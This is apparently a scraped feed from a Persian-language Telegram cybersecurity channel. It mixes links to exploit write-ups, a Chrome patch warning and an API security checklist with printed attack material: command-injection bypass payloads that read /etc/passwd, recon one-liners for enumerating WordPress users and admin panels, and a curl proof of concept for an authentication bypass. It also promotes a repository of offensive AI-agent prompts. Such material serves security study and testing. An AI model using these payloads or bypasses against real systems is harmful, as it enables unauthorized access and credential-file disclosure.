ارتقای سطح دسترسی (Privilege Escalation) تو ویندوز
عملا همیشه برمیگرده به Enumeration درست و حسابی.
اما Enumeration خوب یعنی بدونی چی رو باید چک کنی و دنبال چی بگردی. این مهارت یه شبه به دست نمیاد؛ معمولا با شناخت سیستم ها و تجربه کمکم شکل میگیره.
اوایل مسیر، PrivEsc خیلی ترسناک و شلوغ به نظر میاد. کلی چیز جلوت هست و حس میکنی باید همه چی رو زیر و رو کنی به امید اینکه یه باگ از توش دربیاد.
ولی با گذشت زمان، ذهنت فیلتر میسازه؛ میفهمی چی طبیعیه و چی مشکوکه. از یه جایی به بعد، بهجای گشتن کورکورانه، دقیقا میدونی کجاها رو باید نگاه بندازی.
هدف این راهنما هم دقیقا همینه:
اینکه یه پایه یه درست بهت بده تا روش بسازی و بدونی از کجا شروع کنی، نه اینکه فقط دنبال سوزن تو انبار کاه بگردی.
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
عملا همیشه برمیگرده به Enumeration درست و حسابی.
اما Enumeration خوب یعنی بدونی چی رو باید چک کنی و دنبال چی بگردی. این مهارت یه شبه به دست نمیاد؛ معمولا با شناخت سیستم ها و تجربه کمکم شکل میگیره.
اوایل مسیر، PrivEsc خیلی ترسناک و شلوغ به نظر میاد. کلی چیز جلوت هست و حس میکنی باید همه چی رو زیر و رو کنی به امید اینکه یه باگ از توش دربیاد.
ولی با گذشت زمان، ذهنت فیلتر میسازه؛ میفهمی چی طبیعیه و چی مشکوکه. از یه جایی به بعد، بهجای گشتن کورکورانه، دقیقا میدونی کجاها رو باید نگاه بندازی.
هدف این راهنما هم دقیقا همینه:
اینکه یه پایه یه درست بهت بده تا روش بسازی و بدونی از کجا شروع کنی، نه اینکه فقط دنبال سوزن تو انبار کاه بگردی.
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤6👍1🏆1
''Exploiting A Pre-Auth RCE in W3 Total Cache For WordPress (CVE-2025-9501) | RCE Security''
https://www.rcesecurity.com/2025/11/exploiting-a-pre-auth-rce-in-w3-total-cache-for-wordpress-cve-2025-9501/
https://www.rcesecurity.com/2025/11/exploiting-a-pre-auth-rce-in-w3-total-cache-for-wordpress-cve-2025-9501/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻#infosec #pentest #redteam #blueteam
GROUP ™️
@mandegar_sec | channel
❤6
⚠️ هشدار امنیتی برای کاربران Google Chrome
گوگل اعلام کرده دو مشکل امنیتی «پرخطر» در مرورگر Chrome شناسایی شده که میتواند به هکرها اجازه دهد از طریق وبسایتهای آلوده یا کدهای مخرب، به اطلاعات کاربران دسترسی پیدا کنند.
این یعنی اگر مرورگر بهروز نباشد، باز کردن یک سایت ناسالم میتواند منجر به سرقت اطلاعات، دسترسی غیرمجاز یا اجرای کد مخرب شود.
گوگل برای این مشکل آپدیت امنیتی منتشر کرده و تأکید کرده کاربران نباید منتظر آپدیت خودکار بمانند.
راهحل ساده:
Menu ⋮ → Help → About Chrome
آپدیت را نصب کنید و روی Relaunch کلیک کنید.
در صورت بروز هرگونه تهدید دیجیتال با
«میز کمکهای فوری امنیت دیجیتال میان»
تماس بگیرید:
Signal: +46766860503
Telegram:@miaan_helpline_bot
Email:helpdesk@miaan.org
گوگل اعلام کرده دو مشکل امنیتی «پرخطر» در مرورگر Chrome شناسایی شده که میتواند به هکرها اجازه دهد از طریق وبسایتهای آلوده یا کدهای مخرب، به اطلاعات کاربران دسترسی پیدا کنند.
این یعنی اگر مرورگر بهروز نباشد، باز کردن یک سایت ناسالم میتواند منجر به سرقت اطلاعات، دسترسی غیرمجاز یا اجرای کد مخرب شود.
گوگل برای این مشکل آپدیت امنیتی منتشر کرده و تأکید کرده کاربران نباید منتظر آپدیت خودکار بمانند.
راهحل ساده:
Menu ⋮ → Help → About Chrome
آپدیت را نصب کنید و روی Relaunch کلیک کنید.
در صورت بروز هرگونه تهدید دیجیتال با
«میز کمکهای فوری امنیت دیجیتال میان»
تماس بگیرید:
Signal: +46766860503
Telegram:@miaan_helpline_bot
Email:helpdesk@miaan.org
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤9
شاید باورتون نشه اما باید بگم؛
کسی قرار نیست به خاطر از خود گذشتگی های شما و البته سازگارهای زیاد بهتون مدال بده؛
در نهایت آدم ها با جمله
«مگه من گفتم انجامش بدی»
نا امیدتون میکنن...
پس تلاش کنید
همه جا به اندازه باشید؛
ترمیم روحتون بعدِ شنیدن این جمله کار سختیه...
❤8👍2🍌1
📌2FA Bypass Methods
#infosec #cybersecurity #hacking #pentesting #security
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#infosec #cybersecurity #hacking #pentesting #security
❤4👍1🍌1
Simple Command Injection Bypass
🚀 https://github.com/swisskyrepo/PayloadsAllTheThings
#BugBounty #RCE #InfoSec
1. cat</etc/passwd
2. {cat,/etc/passwd}
3. cat${IFS}/etc/passwd
4. cat%20/et%5C%0Ac/pa%5C%0Asswd
5. cat echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"🚀 https://github.com/swisskyrepo/PayloadsAllTheThings
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#BugBounty #RCE #InfoSec
❤3
This media is not supported in your browser
VIEW IN TELEGRAM
File-Smuggling
HTML smuggling is not an evil, it can be useful
https://github.com/eddiechu/File-Smuggling
HTML smuggling is not an evil, it can be useful
https://github.com/eddiechu/File-Smuggling
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4
چک لیست امنیت API🛡:
چک لیستی از مهمترین اقدامات متقابل امنیتی هنگام طراحی، آزمایش و انتشار API شما.
https://github.com/shieldfy/API-Security-Checklist
#cybersecurity #api #hacking #bughunting
چک لیستی از مهمترین اقدامات متقابل امنیتی هنگام طراحی، آزمایش و انتشار API شما.
https://github.com/shieldfy/API-Security-Checklist
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
#cybersecurity #api #hacking #bughunting
❤10👍2
یکی از اینفلوئنسرهای حوزه Ai بنام Robin Eber سایت پایین رو ساخته که بصورت رایگان، پرامپت شما رو آنالیز میکنه و بهش نمره میده.
بهتون میگه که آیا پرامپتتون رو خوب نوشتید یا نه و اگر نه، ایرادش کجاست و چطور میتونید بهترش کنید که بهترین خروجی ممکن رو بگیرید.
https://coach.robinebers.com/
بهتون میگه که آیا پرامپتتون رو خوب نوشتید یا نه و اگر نه، ایرادش کجاست و چطور میتونید بهترش کنید که بهترین خروجی ممکن رو بگیرید.
https://coach.robinebers.com/
Robinebers
Robin Ebers' AI Prompt Coach
Write AI coding prompts that actually work in 30 seconds. 15 proven principles from OpenAI and Anthropic's research teams.
❤6👍1
🚨 3 critical/high FreePBX vulnerabilities disclosed
CVE-2025-66039: Authentication bypass
CVE-2025-61675: SQL injection
CVE-2025-61678: File upload leading to RCE
detection noscripts for these vulns:
https://github.com/rxerium/FreePBX-Vulns-December-25
https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/
CVE-2025-66039: Authentication bypass
CVE-2025-61675: SQL injection
CVE-2025-61678: File upload leading to RCE
detection noscripts for these vulns:
https://github.com/rxerium/FreePBX-Vulns-December-25
https://horizon3.ai/attack-research/the-freepbx-rabbit-hole-cve-2025-66039-and-others/
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤4🏆1
THC Release 💥: The world’s largest IP<>Domain database: https://ip.thc.org
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
All forward and reverse IPs, all CNAMES and all subdomains of every domain. For free.
Updated monthly.
Try: curl https://ip.thc.org/1.1.1.1
Raw data (187GB): https://ip.thc.org/docs/bulk-data-access
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤8🍌2
🤖 Offensive-AI-Agent-Prompts :
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی.
پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه .
#Ai :
ChatGPT، Gemini-CLI، DeepSeek، Cursor AI، Claude Code و Copilot
-> Pentester، Bug Hunter , Blue Team , red team
https://github.com/CyberSecurityUP/Offensive-AI-Agent-Prompts
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
4👍8🏆2
Mandegar SEC🎩
🤖 Offensive-AI-Agent-Prompts : یه ریپو که یاد میده چطور از هوش مصنوعی به عنوان Agent امنیتی استفاده میشه ، نه فقط یه چتبات معمولی. پرامپت ها طوری طراحی شدن که با AI تست نفوذ، تحلیل آسیبپذیری و بررسی امنیتی چجور انجام میشه . #Ai : ChatGPT، Gemini-CLI،…
وای بچه ها مرسییییییییییی واقعاااا برا استارز😍😍😍😘😘😘😘
❤6🍌4
one liner automation :😎
CSP Bypass Check :
WordPress Enumeration :
☠️ Mass PTR lookup
Exposed Admin Panels
💀 Find Hidden Admin Routes in JS
CSP Bypass Check :
cat alive.txt | httpx -silent -include-response-header | grep -i
cat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200WordPress Enumeration :
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 |anew wp_users.txt☠️ Mass PTR lookup
prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txtExposed Admin Panels
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt💀 Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤5🍌1
CVE-2025-66489 - Authentication Bypass via TOTP Code Presence
curl -X POST http://localhost:3001/api/auth/callback/credentials
-H "Content-Type: application/x-www-form-urlencoded" \
-b cookies.txt \
-c cookies.txt \
-d "csrfToken=<TOKEN>&email=free@example.com&password=WRONG&totpCode=123456"
برای دریافت بهروزرسانیهای امنیتی روزانه، و اخبار امنیت سایبری مارو به عنوان منبع مورد نظر خود دنبال کنید ->❤️💻
GROUP ™️
@mandegar_sec | channel
❤6